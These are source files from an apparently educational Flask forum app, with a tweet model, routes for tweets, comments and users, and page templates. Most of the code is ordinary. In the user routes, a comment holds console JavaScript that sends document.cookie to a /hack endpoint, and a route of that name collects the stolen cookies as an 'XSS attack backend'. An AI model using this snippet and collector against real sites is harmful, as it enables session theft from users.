server_normal_Flask_beautiful/models/tweet.py
from models import MonModel, change_time
import models.user
from models.board import Board
from models.comment import Comment
import time

class Tweet(MonModel):
    """
    __fields__ = [
    '_id',
    ('id', int, -1),
    ('type', str, ''),
    ('deleted', bool, False),
    ('created_time', int, 0),
    ('updated_time', int, 0),
    """
    __fields__ = MonModel.__fields__ + [
        ('title', str, ''),
        ('content', str, ''),
        ('views', int, 0),
        ('user_id', int, -1),
        ('board_id', int, -1),
        ('user_name', str, ''),
        ('who_likes', list, []),
    ]

    # def comments(self):
    #     # return [c for c in Comment.all() if c.tweet_id == self.id]
    #     return Comment.find_all(tweet_id=self.json()['id'])
    #
    # def user(self):
    #     u = User.find_by(id=self.__dict__.get('user_id'))
    #     return u.json()['username']
    @classmethod
    def update(cls, form):
        tweet_id = int(form.get('id', -1))
        whitelist = ['id', 'title', 'content', 'views', 'user_id', 'board_id', 'user_name', 'who_likes']
        Tweet.ori_update(whitelist, tweet_id, form)

    def like(self, id):
        self.who_likes.append(id)
        self.save()

    def delike(self, id):
        self.who_likes.remove(id)
        self.save()


    def comments(self):
        # return [c for c in Comment.all() if c.tweet_id == self.id]
        return Comment.find_all(tweet_id=self.id)

    def user(self):
        u = models.user.User.find_by(id=self.user_id)
        return u

    def board(self):
        u = Board.find_by(id=self.board_id)
        return u

    @classmethod
    def get(cls, id):
        t = cls.find(id)
        t.views += 1
        t.save()
        return t

    # 父类remove只是删除了tweet，但是其所拥有的comment的deleted字段变成False
    def remove_with_comments(self, id):
        self.remove(id)
        for c in self.comments():
            c.deleted = True
            c.save()

# class Tweet(Model):
#     def __init__(self, form, user_id=-1):
#         self.id = form.get('id', None)
#         self.content = form.get('content', '')
#         self.user_id = form.get('user_id', user_id)
#
#     def comments(self):
#         # return [c for c in Comment.all() if c.tweet_id == self.id]
#         return Comment.find_all(tweet_id=self.id)
#
#     def user(self):
#         u = User.find_by(id=self.user_id)
#         return u


# 不可在此文件中测试，因为路径的问题不能找到Tweet.txt和Comment.txt
# 需在与models平级的文件中测试
# def test_tweet():
#     # 用户 1 发微博
#     form = {
#         'content': 'hello tweet'
#     }
#     t = Tweet(form, 1)
#     t.save()
#     # 用户 2 评论微博
#     form = {
#         'content': '楼主说得对'
#     }
#     c = Comment(form, 2)
#     c.tweet_id = 1
#     c.save()
#     t = Tweet.find(1)
#     print('comments, ', t.comments())
#
#
# test_tweet()

server_normal_Flask_beautiful/routes/routes_comment.py
from models.user import User
from models.tweet import Tweet
from models.comment import Comment
from routes import (
    login_required,
    current_user,
)

from utils import log
from flask import (
    request,
    Blueprint,
    render_template,
    redirect,
    url_for,
    session,
    make_response,
    abort,
)
from config import gg


main = Blueprint('comment', __name__)


@main.route('/add', methods=['POST'])
@login_required
def add():
    """
    添加comment
    :return: 返回index页面
    """
    user = current_user()
    if Comment.check_token():
        form = request.form
        c = Comment.new(form, user_id=user.id, user_name=user.username)
        return redirect(url_for('tweet.detail', tweet_id=c.tweet_id, token=gg.token[user.id]))


@main.route('/delete/<int:comment_id>', methods=['GET'])
@login_required
def delete(comment_id):
    if Comment.check_token():
        c = Comment.find(comment_id)
        Comment.check_id(id=comment_id)
        c.remove(comment_id)
        return redirect(url_for('tweet.detail', tweet_id=c.tweet_id, token=gg.token[current_user().id]))


@main.route('/edit/<int:comment_id>', methods=['GET'])
@login_required
def edit(comment_id):
    user = current_user()
    if Comment.check_token():
        c = Comment.find(comment_id)
        Comment.check_id(id=comment_id)
        return render_template('tweet/comment_edit.html', c=c, token=gg.token[user.id], user=user)


@main.route('/update', methods=['POST'])
@login_required
def update():
    if Comment.check_token():
        form = request.form
        Comment.check_id(form)
        newComment = Comment.update(form)
        # redirect有必要加query吗
        return redirect(url_for('tweet.detail', tweet_id=newComment.tweet_id, token=gg.token[current_user().id]))


@main.route('/like/<int:comment_id>', methods=['GET'])
@login_required
def like(comment_id):
    user = current_user()
    c = Comment.find(comment_id)
    if Comment.check_token():
        c.like(user.id)
        user.like_comment(comment_id)
        return redirect(url_for('tweet.detail', tweet_id=c.tweet().id, token=gg.token[user.id]))


@main.route('/delike/<int:comment_id>', methods=['GET'])
@login_required
def delike(comment_id):
    user = current_user()
    c = Comment.find(comment_id)
    if Comment.check_token():
        c.delike(user.id)
        user.delike_comment(comment_id)
        return redirect(url_for('tweet.detail', tweet_id=c.tweet().id, token=gg.token[user.id]))

server_normal_Flask_beautiful/routes/routes_tweet.py
from models.user import User
from models.tweet import Tweet
from models.board import Board
from models.comment import Comment

from utils import log
from flask import (
    request,
    Blueprint,
    render_template,
    redirect,
    url_for,
    session,
    make_response,
    abort,
)
from routes import (
    login_required,
    current_user,
    tweets_and_boards,
)
from config import gg


main = Blueprint('tweet', __name__)


# 几个问题
# 1.什么时候验证login_required？
# 数据的CRUD的时候需要验证，这里包括去CRUD的页面。不login，这些页面去不了。
# 对于index页面，在没有login的时候也能显示，但是有些按钮元素不显示，这需要靠 user = current_user()判断
# 2.什么时候初始化一个新的token？
# 在index的时候, Tweet，待办事项，Mail， profile，setting
@main.route('/index', methods=['GET'])
# @login_required
def index():
    """
    显示该用户所有tweet
    :return: 显示tweet页面
    """
    user = current_user()
    board_id = int(request.args.get('board_id', -1))
    current_page = int(request.args.get('page', 1))
    tweets, bs, pages = tweets_and_boards(board_id, current_page)
    if user is not None:
        # 保证每次调用index函数时清空gg,保证每次调用index函数时都有新的token可用
        print('from tweet_index  before', gg.csrf_tokens)
        gg.reset_value(user.id)
        print('from tweet_index  after', gg.csrf_tokens)
        return render_template('tweet/tweet_index.html', current_page=current_page, pages = range(pages), tweets=tweets, bs=bs, board_id=board_id, user=user, token=gg.token[user.id])
    return render_template('tweet/tweet_index.html', pages = range(pages), tweets=tweets, bs=bs, board_id=board_id, user=user)


@main.route('/delete/<int:tweet_id>', methods=['GET'])
@login_required
def delete(tweet_id):
    if Tweet.check_token():
        t = Tweet.find(tweet_id)
        Tweet.check_id(id=tweet_id)
        t.remove_with_comments(tweet_id)
        return redirect(url_for('.index'))


# @main.route('/new', methods=['GET'])
# @login_required
# def new():
#     user = current_user()
#     board_id = int(request.args.get('board_id', -1))
#     if Tweet.check_token():
#         bs = Board.find_all()
#         return render_template('tweet/tweet_new.html', token=gg.token[user.id], bs=bs, board_id=board_id, user=user)


@main.route('/add', methods=['GET', 'POST'])
@login_required
def add():
    user = current_user()
    # 这个board_id 是为了跳转index页面而存在，而不是为title和content服务，form里面还应有board_id
    board_id = int(request.args.get('board_id', -1))
    if Tweet.check_token():
        form = request.form
        if form.get('title'):
            t = Tweet.new(form, user_id=user.id, user_name=user.username)
            # t.user_id = u.id
            # t.save()
            # redirect有必要加query吗
            # return redirect('/tweet/index?user_id={}'.format(user.id))
            return redirect(url_for('.index', board_id=board_id))
        else:
            bs = Board.find_all()
            return render_template('tweet/tweet_new.html', token=gg.token[user.id], bs=bs, board_id=board_id, user=user)


@main.route('/edit/<int:tweet_id>', methods=['GET'])
@login_required
def edit(tweet_id):
    user = current_user()
    if Tweet.check_token():
    # tweet_id = int(request.args.get('id', -1))
        t = Tweet.find(tweet_id)
        Tweet.check_id(id=tweet_id)
        return render_template('tweet/tweet_edit.html', t=t, token=gg.token[user.id], user=user)


@main.route('/update', methods=['POST'])
@login_required
def update():
    if Tweet.check_token():
        form = request.form
        Tweet.check_id(form)
        Tweet.update(form)
        # todo Tweet update 完成之后 需要到 Tweet 的 index 页面 还是 detail 页面呢？
        return redirect(url_for('.index'))


@main.route('/detail/<int:tweet_id>', methods=['GET'])
# @login_required
def detail(tweet_id):
    user = current_user()
    t = Tweet.get(tweet_id)
    if user is not None:
        # 保证每次调用index函数时清空gg,保证每次调用index函数时都有新的token可用
        print('from tweet_datail  before', gg.csrf_tokens)
        gg.reset_value(user.id)
        print('from tweet_datail  after', gg.csrf_tokens)
        # tweet_id = int(request.args.get('id', -1))
        #     t = Tweet.find(tweet_id)
        # 这里不需要验证是否是自己发的tweet
        # if u.id == t.user_id:
        return render_template('tweet/tweet_detail.html', t=t, token=gg.token[user.id], user=user)
    return render_template('tweet/tweet_detail.html', t=t, user=user)


@main.route('/like/<int:tweet_id>', methods=['GET'])
@login_required
def like(tweet_id):
    user = current_user()
    t = Tweet.find(tweet_id)
    if Tweet.check_token():
        t.like(user.id)
        user.like_tweet(tweet_id)
        return redirect(url_for('.detail', tweet_id=tweet_id, token=gg.token[user.id]))


@main.route('/delike/<int:tweet_id>', methods=['GET'])
@login_required
def delike(tweet_id):
    user = current_user()
    t = Tweet.find(tweet_id)
    if Tweet.check_token():
        t.delike(user.id)
        user.delike_tweet(tweet_id)
        return redirect(url_for('.detail', tweet_id=tweet_id, token=gg.token[user.id]))

server_normal_Flask_beautiful/routes/routes_user.py
from utils import log
from config import  gg, image_file_dir
from routes import (
    current_user,
    login_required,
)

from flask import (
    request,
    Blueprint,
    render_template,
    redirect,
    url_for,
    session,
    make_response,
    send_from_directory,
    abort,
    flash,
)
from models.user import User
from models.board import Board
from models.mail import Mail


main = Blueprint('user', __name__)


@main.route('/', methods=['GET'])
def index():
    return render_template('blog/blog_index.html')


@main.route('/admin', methods=['GET'])
@login_required
def admin():
    """
    只有用户id为1的用户有权限
    :return: 返回所有用户的信息
    """
    user = current_user()
    User.check_admin()
    print('from admin  before', gg.csrf_tokens)
    gg.reset_value(user.id)
    print('from admin  after', gg.csrf_tokens)
    return render_template('user/admin.html', token=gg.token[user.id], mails=Mail.find_all(), user=user, users=User.find_all(), boards=Board.find_all())


@main.route('/admin/edit/<int:user_id>', methods=['GET'])
@login_required
def admin_edit(user_id):
    """
    只有用户id为1的用户有权限，输入需要修改的id和password
    :return: 返回修改过的所有用户的信息
    """
    user = current_user()
    if User.check_token():
        User.check_admin()
        u = User.find(user_id)
        return render_template('user/admin_edit.html', token=gg.token[user.id], user=user, u=u)


@main.route('/admin/update', methods=['POST'])
@login_required
def admin_update():
    """
    只有用户id为1的用户有权限，输入需要修改的id和password
    :return: 返回修改过的所有用户的信息
    """
    if User.check_token():
        User.check_admin()
        form = request.form
        User.update(form)
        return redirect(url_for('.admin'))


# 增加一个register的路由函数
@main.route('/admin/register', methods=['POST'])
def admin_register():
    """
    允许GET是因为在地址栏输入地址转到register页面需要
    POST是因为在register页面输入账号密码点击register按钮需要
    主要的bug是转到register页面和register页面都都是同一个路由函数
    :return: 返回register页面，并显示所有用户信息
    """
    if User.check_token():
        User.check_admin()
        form = request.form
        if User.validate_register(form):
            return redirect(url_for('.admin'))


@main.route('/admin/delete/<int:user_id>')
@login_required
def user_delete(user_id):
    if User.check_token():
        User.check_admin()
        User.remove(user_id)
        return redirect(url_for('.admin'))


# 所有用户上传头像,先存在本地得到路径之后上传至七牛云，并删除本地图片
@main.route('/add_image', methods=['POST'])
@login_required
def add_img():
    user = current_user()
    if User.check_token():
        file = request.files['avatar']
        user.save_and_up(file)
        return redirect(url_for('.user_setting', id=user.id, token=gg.token[user.id]))


# web后端上传头像，后续可以改成Nginx+图床
# 本地只有default.png一张图片
@main.route('/uploads/<filename>')
@login_required
def uploads(filename):
    return send_from_directory(image_file_dir, filename)


# 在知乎console输入
# var c = document.cookie
# var img = `<img src='http://localhost:4000/hack?cookie=${c}'>`
# document.body.innerHTML += img
@main.route('/hack')
def hack():
    # xss 攻击的后台
    cookie = request.args.get('cookie')
    print('cookie', cookie)


# 增加一个可以看到任意user的路由函数
# 不需要check token，CRUD中除了查不需要验证token，但是需要传递token
# 需要传递   u: 我想要看的用户    和    user: current_user()
@main.route('/user/<int:id>')
# @login_required
def user_detail(id):
    user = current_user()
    u = User.find(id)
    if u is None:
        abort(404)
    if user is not None:
        # 保证每次调用index函数时清空gg,保证每次调用index函数时都有新的token可用
        print('from profile  before', gg.csrf_tokens)
        gg.reset_value(user.id)
        print('from profile  after', gg.csrf_tokens)
        return render_template('user/profile.html', u=u, token=gg.token[user.id], user=user)
    return render_template('user/profile.html', u=u, user=user)


# update方法需要重新写，统一到model父类中
# 增加一个在setting页面update的路由函数
@main.route('/user/update', methods=['POST'])
@login_required
def user_update():
    user = current_user()
    if User.check_token():
        form = request.form
        user.password_update(form)
        return redirect(url_for('user.user_setting', id=user.id, token=gg.token[user.id]))


# 增加一个去setting页面的路由函数
@main.route('/setting')
@login_required
def user_setting():
    user = current_user()
    if user is not None:
        # 保证每次调用index函数时清空gg,保证每次调用index函数时都有新的token可用
        print('from setting  before', gg.csrf_tokens)
        gg.reset_value(user.id)
        print('from setting  after', gg.csrf_tokens)
        return render_template('user/setting.html', user=user, token=gg.token[user.id], bid=-1)


# GET 去 登陆 页面， POST 提交表单
@main.route('/login', methods=['GET', 'POST'])
def user_login():
    form = request.form
    log('from route_login --> cookies: ', request.cookies)
    # ImmutableMultiDict([])是什么鬼？
    if form.get('username', None):
        if User.validate_login(form):
            u = User.find_by(username=form.get('username'))
            print('from signin  before', session)
            session['user_id'] = u.id
            print('from signin  after', session)
            return redirect(url_for('tweet.index'))
        else:
            flash('账号密码输入错误，请核对后再输入')
            return redirect(url_for('.user_login'))
    else:
        return render_template('user/login.html')


# GET 去  注册 页面， POST 提交表单
@main.route('/register', methods=['GET', 'POST'])
def user_register():
    """
    允许GET是因为在地址栏输入地址转到register页面需要
    POST是因为在register页面输入账号密码点击register按钮需要
    主要的bug是转到register页面和register页面都都是同一个路由函数
    :return: 返回register页面，并显示所有用户信息
    """
    form = request.form
    if form.get('username', None):
        if User.validate_register(form):
            return redirect(url_for('user.user_login'))
        else:
            flash('用户名和密码长度必须大于2，请核对后再输入')
            return redirect(url_for('.user_register'))
    else:
        return render_template('user/register.html')


@main.route('/signout')
def user_signout():
    """
    在session中删除当前登录的user_id
    :return: 返回login页面
    """
    if User.check_token():
        print('from signout  before', session)
        session.pop('user_id')
        print('from signout  after', session)
        return redirect(url_for('tweet.index'))

server_normal_Flask_beautiful/templates/tweet/comment_edit.html
{% extends "base.html" %}

{% import "macros.html" as macros %}

{% block title %}
    comment edit
{% endblock %}

{% block sidebar_panel %}
    {{ macros.Markdown_info_sidebar() }}
{% endblock %}

{% block content %}
    {{ macros.user_action_edit_content('comment.update', token, t=c, is_not_comment=false) }}
{% endblock %}

server_normal_Flask_beautiful/templates/tweet/tweet_detail.html
{% extends "base.html" %}

{% import "macros.html" as macros %}

{% block title %}
    tweet detail
{% endblock %}

{% block sidebar_panel %}
    {% set u = t.user() %}
    {{ macros.user_info_sidebar(u) }}
    {{ macros.user_action_new_mail(user, u, token) }}
    {{ macros.user_action_new_tweet(user, token) }}
{% endblock %}


{% block content %}
    {% set u = t.user() %}
    <div class='panel'>
        <div class='header topic_header'>
                <span class="topic_full_title">
                    <span class="put_good">{{ t.board().title }}</span>
                    {{ t.title }}
                </span>
            <div class="changes">
                <span class="time" data-type='发布于 ' id="{{ t.created_time }}"></span>
                <span>
                        作者
                    {% if user %}
                        <a href="{{ url_for('user.user_detail', id=u.id) }}">
                            {{ u.username }}
                        </a>
                    {% else %}
                        <a href="{{ url_for('user.user_detail', id=u.id) }}">
                        {{ u.username }}
                    {% endif %}
                    </a>
                    </span>
                <span>
                        {{ t.views }} 次浏览
                     </span>
                <span>
                        来自 {{ t.board().title }}
                     </span>
                <span class="time" data-type='最后一次编辑是 ' id="{{ t.updated_time }}"></span>

                {% if user %}
                    {% if user.id != t.user_id %}
                        {% if user.id in t.who_likes %}
                            <span>
                                <a href="{{ url_for('tweet.delike', tweet_id=t.id, token=token) }}"
                                   class="span-common pull-right collect_btn">
                                    <span>取消收藏</span>
                                </a>
                            </span>
                        {% else %}
                            <span>
                                <a href="{{ url_for('tweet.like', tweet_id=t.id, token=token) }}"
                                   class="span-common span-success pull-right collect_btn">
                                <span class="span-success">收藏</span>
                            </a>
                            </span>
                        {% endif %}
                    {% else %}
                        <span>
                          <a href="{{ url_for('tweet.delete', tweet_id=t.id, token=token) }}">删除</a>
                        </span>
                        <span>
                         <a href="{{ url_for('tweet.edit', tweet_id=t.id, token=token) }}">编辑</a>
                        </span>
                    {% endif %}
                {% endif %}

            </div>
        </div>

        <div class='inner topic'>
            <div class='topic_content'>
                <div class="markdown-text">{{ t.content }}</div>
            </div>
        </div>
    </div>
    <div class='panel'>
        <div class='header'>
            <span class='col_fade'>
                <!-- 过滤器 -->
                {{ t.comments() | count }} 回复
            </span>
        </div>
        {% for c in t.comments() %}
            {% set u = c.user() %}
            <div class='cell reply_area reply_item'>
                <div class='author_content'>
                    {% if user %}
                        <a href="{{ url_for('user.user_detail', id=u.id) }}" class="user_avatar">
                            <img src="{{ u.user_image }}" title="{{ u.username }}"/>
                        </a>
                        <div class='user_info'>
                            <a class='dark reply_author' href="{{ url_for('user.user_detail', id=u.id) }}">
                                {{ u.username }}
                            </a>
                            <a class="reply_time">
                                {{ loop.index }}楼 / {{ loop.length }}楼 •
                                <span class="time" data-type='回复于 ' id="{{ c.created_time }}"></span>
                                {% if u.id == t.user().id %}
                                    <span class="reply_by_author">作者</span>
                                {% endif %}
                            </a>
                        </div>
                        {% if user.id == u.id %}
                            <a href="{{ url_for('comment.delete', comment_id=c.id, token=token) }}">删除</a>
                            <a href="{{ url_for('comment.edit', comment_id=c.id, token=token) }}">编辑</a>
                        {% endif %}
                        <div class="user_action">
                        <span>
                            {% if user.id in c.who_likes %}
                                {{ macros.like_or_delike('delike', c, token) }}
                            {% else %}
                                {{ macros.like_or_delike('like', c, token) }}
                            {% endif %}
                            <span class="up-count">{{ c.who_likes | count }}</span>
                        </span>
                        </div>

                    {% else %}
                        <a href="{{ url_for('user.user_detail', id=u.id) }}" class="user_avatar">
                            <img src="{{ u.user_image }}" title="{{ u.username }}"/>
                        </a>
                        <div class='user_info'>
                            <a class='dark reply_author' href="{{ url_for('user.user_detail', id=u.id) }}">
                                {{ u.username }}
                            </a>
                            <a class="reply_time">
                                {{ loop.index }}楼 / {{ loop.length }}楼 •
                                <span class="time" data-type='回复于 ' id="{{ c.created_time }}"></span>
                                {% if u.id == t.user().id %}
                                    <span class="reply_by_author">作者</span>
                                {% endif %}
                            </a>
                        </div>
                        <div class="user_action">
                        <span>
                            {% if user.id in c.who_likes %}
                                {{ macros.like_or_delike('delike', c) }}
                            {% else %}
                                {{ macros.like_or_delike('like', c) }}
                            {% endif %}
                            <span class="up-count">{{ c.who_likes | count }}</span>
                        </span>
                        </div>
                    {% endif %}
                </div>
                <div class='reply_content from-leiwei1991'>
                    <div class="markdown-text">{{ c.content }}</div>
                </div>
            </div>
        {% endfor %}
    </div>
    {% if user %}
        <div class="panel">
            <div class="header">
                <span class="col_fade">添加回复</span>
            </div>
            <div class="inner reply">
                <form id="reply_form" action="{{ url_for('comment.add', token=token) }}" method="post">
                    <div class="markdown_editor in_editor">
                        <div class="markdown_in_editor">
                            <input type="hidden" name="tweet_id" value="{{ t.id }}">
                            <textarea class='editor' name='content' rows='8'></textarea>
                            <div class='editor_buttons'>
                                <input class='span-primary submit_btn' type="submit" data-loading-text="回复中.."
                                       value="回复">
                            </div>
                        </div>
                    </div>
                </form>
            </div>
        </div>
    {% endif %}
{% endblock %}

server_normal_Flask_beautiful/templates/tweet/tweet_edit.html
{% extends "base.html" %}

{% import "macros.html" as macros %}

{% block title %}
    tweet new
{% endblock %}

{% block sidebar_panel %}
    {{ macros.Markdown_info_sidebar() }}
{% endblock %}

{% block content %}
    {{ macros.user_action_edit_content('tweet.update', token, t=t) }}
{% endblock %}

server_normal_Flask_beautiful/templates/tweet/tweet_index.html
{% extends "base.html" %}

{% import "macros.html" as macros %}

{% block title %}
    tweet index
{% endblock %}

{% block sidebar_panel %}
    {{ macros.user_info_sidebar(user) }}
    {{ macros.user_action_new_tweet(user, token, bid=board_id) }}

{% endblock %}

{% block content %}
    <div class="panel">
    <div class="header">
        <a href="{{ url_for('tweet.index') }}" class="topic-tab current-tab">全部</a>
        {% for b in bs %}
            <a href="{{ url_for('tweet.index', board_id=b.id) }}"
               class="topic-tab current-tab">{{ b.title }}</a>
        {% endfor %}
    </div>
    <div class="inner post">
    <div class="topic_list">
        {% for t in tweets %}
            <div class="cell">
                {% set u = t.user() %}
                {{ macros.user_avatar_left(u) }}
                {{ macros.counts(t) }}

                {% if t.comments() %}
                    {% for c in t.comments() %}
                        {% if loop.last %}
                            {{ macros.last_time(t, c=c, last=true, data_type='最新评论 ') }}
                        {% endif %}
                    {% endfor %}
                {% else %}
                    {{ macros.last_time(t, u=u) }}
                {% endif %}

                <div class="topic_title_wrapper">
                    <span class="put_good">{{ t.board().title }}</span>
                    {# 使用这种办法导致了代码重复 #}
                    {% if user %}
                        {{ macros.topic_title('tweet.detail', t, 'tweet') }}

                    {% else %}
                        {{ macros.topic_title('tweet.detail', t, 'tweet') }}

                    {% endif %}
                </div>
            </div>
        {% else %}
            <div class="inner">
                <p>无tweet</p>
            </div>
        {% endfor %}
    </div>
    {{ macros.pagination('tweet.index', pages, current_page, board_id) }}
{% endblock %}

server_normal_Flask_beautiful/templates/tweet/tweet_new.html
{% extends "base.html" %}

{% import "macros.html" as macros %}

{% block title %}
    tweet new
{% endblock %}

{% block sidebar_panel %}
    {{ macros.Markdown_info_sidebar() }}
{% endblock %}

{% block content %}
    {{ macros.user_action_new_content('tweet.index', 'tweet.add', token, bs=bs, board_id=board_id, header_a='主页', header_title='发布tweet', select=true) }}
{% endblock %}